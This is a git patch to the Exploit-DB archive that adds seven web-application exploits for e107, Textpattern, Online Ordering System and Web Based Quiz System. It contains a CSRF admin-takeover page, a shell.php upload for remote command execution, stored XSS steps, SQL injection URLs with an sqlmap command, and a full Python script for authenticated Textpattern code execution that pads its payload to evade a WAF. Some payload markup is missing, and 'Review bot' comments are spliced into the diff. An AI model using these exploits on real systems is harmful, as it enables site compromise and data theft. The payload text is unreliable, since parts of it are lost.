From 557267457676a499cc10519d401fb3c2b305dfb2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 5 Mar 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-03-05

8 changes to exploits/shellcodes

e107 CMS 2.3.0 - CSRF
Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
---
 exploits/php/webapps/47289.txt | 1 +
 exploits/php/webapps/49614.txt | 70 ++++++++++++++++++++++
 exploits/php/webapps/49615.txt | 79 +++++++++++++++++++++++++
 exploits/php/webapps/49616.txt | 18 ++++++
 exploits/php/webapps/49617.txt | 18 ++++++
 exploits/php/webapps/49618.txt | 19 ++++++
 exploits/php/webapps/49619.txt | 18 ++++++
 exploits/php/webapps/49620.py | 104 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 7 +++
 9 files changed, 334 insertions(+)
 create mode 100644 exploits/php/webapps/49614.txt
 create mode 100644 exploits/php/webapps/49615.txt
 create mode 100644 exploits/php/webapps/49616.txt
 create mode 100644 exploits/php/webapps/49617.txt
 create mode 100644 exploits/php/webapps/49618.txt
 create mode 100644 exploits/php/webapps/49619.txt
 create mode 100755 exploits/php/webapps/49620.py
diff --git a/exploits/php/webapps/47289.txt b/exploits/php/webapps/47289.txt
index da318036f..0919e5796 100644
--- a/exploits/php/webapps/47289.txt
+++ b/exploits/php/webapps/47289.txt
@@ -4,6 +4,7 @@
 # Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
 # Version: 3.5
 # CWE : CWE-79
+# CVE: CVE-2020-23518
 [Description]
diff --git a/exploits/php/webapps/49614.txt b/exploits/php/webapps/49614.txt
new file mode 100644
index 000000000..561f7f51b
--- /dev/null
+++ b/exploits/php/webapps/49614.txt
@@ -0,0 +1,70 @@
+# Exploit Title: e107 CMS 2.3.0 - CSRF
+# Date: 04/03/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://e107.org
+# Software Link: https://e107.org/download
+# Version: 2.3.0
+# Tested on: Windows 10
+# CVE : CVE-2021-27885
+
+CSRF vulnerability on e107 CMS
+
+## Bug Description
+Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
+
+## How to Reproduce
+Steps to reproduce the behavior:
+1. Create a CSRF login POC using the following code.
+
+```
+
+
+
+Cross Site Request Forgery (Edit Existing Admin details)
+
+
+
+
+
+

Cross Site Request Forgery (Edit Existing Admin details)

+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+```
+
+
+2. Replace the email and password with the valid credentials.
+3. Send the link script to the victim (admin) to make them click.
+4. Login with new admin password
\ No newline at end of file
diff --git a/exploits/php/webapps/49615.txt b/exploits/php/webapps/49615.txt
new file mode 100644
index 000000000..0f3572481
--- /dev/null
+++ b/exploits/php/webapps/49615.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
+# Date: 04/03/2021
+# Exploit Author: Suraj Bhosale
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
+# Version: 1.0
+# Tested on Windows 10, XAMPP
+
+
+Request:
+========
+
+POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
+Gecko/20100101 Firefox/85.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+boundary=---------------------------14955282031852449676680360880
+Content-Length: 972
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/onlineordering/GPST/store/index.php
+Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
+Upgrade-Insecure-Requests: 1
+
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="transnum"
+
+VAF-XAP
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="select1"
+
+25
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="pname"
+
+keychain
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="select2"
+
+1
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="txtDisplay"
+
+25
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="note"
+
+test
+-----------------------------14955282031852449676680360880
+Content-Disposition: form-data; name="image"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
+-----------------------------14955282031852449676680360880--
+
+Response:
+=========
+
+HTTP/1.1 200 OK
+Date: Thu, 04 Mar 2021 13:28:27 GMT
+Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
+X-Powered-By: PHP/7.3.27
+Content-Length: 55
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+# Uploaded Malicious File can be Found in :
+onlineordering\GPST\store\design
+
+# go to
+http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
+which will execute hostname command.
\ No newline at end of file
diff --git a/exploits/php/webapps/49616.txt b/exploits/php/webapps/49616.txt
new file mode 100644
index 000000000..d65735908
--- /dev/null
+++ b/exploits/php/webapps/49616.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-04
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://textpattern.com
+# Software Link: https://textpattern.com/start
+# Version: v 4.8.4
+# Tested on: Windows
+
+Steps-To-Reproduce:
+1. Login into Textpattern CMS admin panel.
+2. Now go to the *Content > C**omments > Message*.
+3. Now paste the below payload in the URL field.
+
+Ba1man”>
+
+4. Now click on the *Save* button.
+5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head
+5. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49617.txt b/exploits/php/webapps/49617.txt
new file mode 100644
index 000000000..0ac1c8698
--- /dev/null
+++ b/exploits/php/webapps/49617.txt
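Review bot: The reproduction steps in 49616.txt number two consecutive steps as `5.` (the navigate step and the trigger step); the last line should read `6. The XSS will be triggered.` The same duplicated numbering appears in 49617.txt. The payload line here shows only `Ba1man”>`, a stray curly quote and closing bracket, which suggests its markup was lost in rendering rather than in the committed file; the committed file should be checked so the entry is complete. Each of these hunks is the whole new file.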
@@ -0,0 +1,18 @@
+# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
+# Date: 2021-03-04
+# Exploit Author: Tushar Vaidya
+# Vendor Homepage: https://textpattern.com
+# Software Link: https://textpattern.com/start
+# Version: v 4.9.0-dev
+# Tested on: Windows
+
+Steps-To-Reproduce:
+1. Login into Textpattern CMS admin panel.
+2. Now go to the *Content > Write > ** Excerpt*.
+3. Now paste the below payload in the URL field.
+
+Ba1man”>
+
+4. Now click on the *Save* button.
+5. Now go to the *articles* page
+5. The XSS will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49618.txt b/exploits/php/webapps/49618.txt
new file mode 100644
index 000000000..fe54cab72
--- /dev/null
+++ b/exploits/php/webapps/49618.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
+# Date: 2021-03-04
+# Exploit Author: Suraj Bhosale
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
+# Version: v1.0
+# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
+# Vulnerable Parameter: id
+
+*Steps to Reproduce:*
+1) Visit
+http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
+2) Now fire up the following command into SQLMAP.
+
+CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
+*
+--batch --dbs
+
+3) Using the above command we will get the name of all the database.
\ No newline at end of file
diff --git a/exploits/php/webapps/49619.txt b/exploits/php/webapps/49619.txt
new file mode 100644
index 000000000..f6431728f
--- /dev/null
+++ b/exploits/php/webapps/49619.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
+# Date: 04-03-2021
+# Exploit Author: Deepak Kumar Bharti
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+
+# Tested on: Windows 10 Pro
+# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in Welcome page in quiz section eid parameter affected from this vulnerability.
+# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
+
+POC:
+# go to url http://localhost/login.php
+# then you have to login with default creds
+# then go to quiz and execute the payload ie:--
+http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
\ No newline at end of file
diff --git a/exploits/php/webapps/49620.py b/exploits/php/webapps/49620.py
new file mode 100755
index 000000000..68f79e1eb
--- /dev/null
+++ b/exploits/php/webapps/49620.py
@@ -0,0 +1,104 @@
+# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2)
+# Date: 03/03/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://textpattern.com/start
+# Version: Previous to 4.8.3
+# Tested on: CentOS, textpattern 4.5.7 and 4.6.0
+# Install dependencies: pip3 install beautifulsoup4 argparse requests
+# Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d
+
+import sys
+import argparse
+import requests
+from bs4 import BeautifulSoup
+
+
+def get_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
+ parser.add_argument('-u', '--user', required=True, action='store', help='Username')
+ parser.add_argument('-p', '--password', required=True, action='store', help='Password')
+ parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute')
+ parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload')
+ parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command')
+ my_args = parser.parse_args()
+ return my_args
+
+
+def get_file_id(s, files_url, file_name):
+ r = s.get(files_url, verify=False)
+ soup = BeautifulSoup(r.text, "html.parser")
+ for a in soup.findAll('a'):
+ if "file_download/" in a['href']:
+ file_id_name = a['href'].split('file_download/')[1].split("/")
+ if file_id_name[1] == file_name:
+ file_id = file_id_name[0]
+ return file_id
+
+
+def login(login_url, user, password):
+ s = requests.Session()
+ s.get(login_url, verify=False)
+ data = {"p_userid":user, "p_password":password, "_txp_token":""}
+ r = s.post(login_url, data=data, verify=False)
+ if str(r.status_code) == "401":
+ print("[+] Invalid credentials")
+ sys.exit(0)
+ _txp_token = ""
+ soup = BeautifulSoup(r.text, "html.parser")
+ fields = soup.findAll('input')
+ for f in fields:
+ if (f['name'] == "_txp_token"):
+ _txp_token = f['value']
+ return s,_txp_token
+
+
+def upload(s, login_url, _txp_token, file_name):
+ php_payload = 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.\n'*1000 # to avoid WAF problems
+ php_payload += ''
+ s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False)
+
+
+def exec_cmd(s, cmd_url, command):
+ r = s.get(cmd_url+command, verify=False)
+ response = r.text.replace("Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.\n","")
+ return response
+
+
+def delete_file(s, login_url, file_id, _txp_token):
+ data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token}
+ s.post(login_url, data=data, verify=False)
+
+
+def main():
+ args = get_args()
+ url = args.target
+ user = args.user
+ password = args.password
+ file_name = args.filename
+ command = args.command
+ delete_after_execute = args.delete
+
+ login_url = url + "/textpattern/index.php"
+ upload_url = url + "/textpattern/index.php"
+ cmd_url = url + "/files/" + file_name + "?cmd="
+ files_url = url + "/textpattern/index.php?event=file"
+
+ s,_txp_token = login(login_url, user, password)
+ print("[+] Logged in")
+ upload(s, login_url, _txp_token, file_name)
+ file_id = get_file_id(s, files_url, file_name)
+ print("[+] File uploaded with id %s"%(file_id))
+ response = exec_cmd(s, cmd_url, command)
+ print("[+] Command output \n%s"%(response))
+
+ if delete_after_execute:
+ print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id))
+ delete_file(s, login_url, file_id, _txp_token)
+ else:
+ print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name))
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 883ad68a4..7ae944904 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
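Review bot: `get_file_id` falls through with an implicit `None` when no `file_download/` link matches `file_name`, and `main` then reports `File uploaded with id None` and, with `-d`, posts that `None` as `selected[]` via `delete_file`; a guard right after the `get_file_id` call, `if file_id is None: sys.exit("[-] Uploaded file not found in file list")`, would make that failure explicit instead of silent. The header's `# Version: Previous to 4.8.3` disagrees with the title and the `files_exploits.csv` entry, which both name 4.8.3 itself, so the affected-version statement should be made consistent. `upload_url` in `main` is assigned and never used. Indentation appears collapsed in this rendering of the hunk, so the block structure of the function bodies cannot be verified from here.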
@@ -43800,3 +43800,10 @@ id,file,description,date,author,type,platform,port
 49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
 49609,exploits/php/webapps/49609.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)",2021-03-03,"Tushar Vaidya",webapps,php,
 49610,exploits/php/webapps/49610.txt,"Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated)",2021-03-03,"Tushar Vaidya",webapps,php,
+49614,exploits/php/webapps/49614.txt,"e107 CMS 2.3.0 - CSRF",2021-03-04,Tadjmen,webapps,php,
+49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution",2021-03-04,"Suraj Bhosale",webapps,php,
+49616,exploits/php/webapps/49616.txt,"Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
+49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,
+49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
+49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
+49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,